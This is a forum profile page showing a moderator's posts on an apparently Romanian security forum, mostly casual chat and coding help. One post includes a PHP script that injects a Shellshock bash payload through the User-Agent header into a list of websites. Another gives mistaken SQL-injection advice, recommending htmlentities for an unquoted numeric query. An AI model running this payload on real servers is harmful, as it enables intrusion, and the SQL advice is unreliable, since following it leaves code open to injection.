Jump to content

Dragos

Moderators
  • Posts

    2660
  • Joined

  • Last visited

  • Days Won

    75

Everything posted by Dragos

  1. Pentru cei care il aleg pe Ponta
  2. Eu vin cu zarurile.
  3. Salutari, Caut un developer de flash pentru un amic pentru crearea unei aplicatii de videochat. Doritorii va rog lasati un raspuns daca ati mai facut asta pana acum sau alte proiecte asemanatoare in flash.
  4. Mergi cu numaratul pixelilor din stanga sus. Facusem nebunia asta pentru un joc acum un an, doi si iti dadea si coordonatele. Ia scriptul si extrage-ti partea care te intereseaza.
  5. S-a prajit de tot Valium. cc @aelius
  6. Functia mysql_real_escape_string nu este suficienta pentru a bloca SQLi. Spre exemplu avem scriptul acesta $id = mysql_real_escape_string($_GET['id']); $sql = mysql_query("select * from tabel where ID=$id"); Daca introduc in GET "1 or 1=2" o sa se execute scriptul. Nu folosi nici scriptul lui @Geoutsu pentru ca se poate trece de el printr-un string codat in hexa. Cel mai usor foloseste htmlentities cu flag-ul ENT_QUOTES. $id = htmlentities($_GET['id'],ENT_QUOTES); $sql = mysql_query("select * from tabel where ID=$id");
  7. L-am primit dupa cateva zile.
  8. E ok ideea, dar macar daca se face, cel care doneaza sa aleaga cumva calumea cui sa-i dea in ideea in care respectivul chiar are nevoie de asta.
  9. Ziceam si la mine pe blog, daca sunt programele de genul acum in varianta preview, ai putea sa incerci sa schimbi locul unde se trimit informatiile si ai toate datele despre om.
  10. Sunt intentionat puse.
  11. Asta e de script-kiddie. Eu in locul developerului as fi pus si un script de minat bitcoini in aplicatie ca daca tot descarca copiii, macar sa fac si eu un ban cinstit. Mai rapid se poate face asa din consola. <?php $situri = array("http://site.ro/","http://site2.ro"); foreach($situri as $sit) { if(scaneaza($sit)) echo $sit . "\n"; } function scaneaza($url) { $cmd = "ls"; $context = stream_context_create( array( 'http' => array( 'method' => 'GET', 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' ) ) if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) return 1; else return 0; } ?>
  12. Din ce am inteles, oamenii de la GlobeHosting nu mai vor sa plateasca taxa de retragere a banilor din Paypal, asa ca te pun pe tine sa platesti si taxa aia. E taranism chestia asta.
  13. In afara sa-l folosesti pe post de carpa sa mai stergi praful sau geamul de la masina, n-ai ce face cu el.
  14. Sare pe filtrele de verificare ca nu ai content si returnezi 500 internal server error.
  15. Pe bune? Flood? Edit: E up
  16. Un mic tool pe care l-am scris in seara asta pentru a verifica daca un site e vulnerabil la CVE-2014-6271/CVE-2014-7169. Am I vulnerable to Shellshock / Bash bug? - Dragos Gaftoneanu
  17. http://edition.cnn.com/2011/09/30/tech/social-media/facebook-charge-fee-ostrow/
  18. Un 404 facut ca la carte
  19. Creeaza fisierul 4char.txt si da-i permisiuni de citire/scriere pe el.
  20. Astea sunt tampenii vechi de pe 4chan. De acolo a aparut si bula magica pentru apa.
  21. Dupa ani si ani, plugin oficial de Wordpress https://wordpress.org/plugins/patch-for-revolution-slider/
  22. Daca ai descarcat ceva de pe torrente, in ziua urmatoare vine politia la tine cu mandat.
  23. Din cate stiu, astfel de contracte se fac cu semnatura olografa conform legii din Romania. Intreaba pe cineva care e jurist.
  24. Dragos

    ItWin.ro

    Ideea e buna, articolele sunt bune, dar tema pare prea incarcata.
  25. Daca ai facut pe contract, citeste un pic clauzele contractului. Daca nu scrie vreo magarie, inseamna ca esti protejat si daca intri in instanta sau ceva, poti arata proiectul facut cap coada. Pastreaza ce ai facut in calculator pana se termina hora. Daca nu ai facut o parte din proiect, e nasol si au libertatea sa te acuze. Daca nu ai facut pe contract, n-ai treaba. Parerea mea e sa le mai trimiti o data proiectul.
×
×
  • Create New...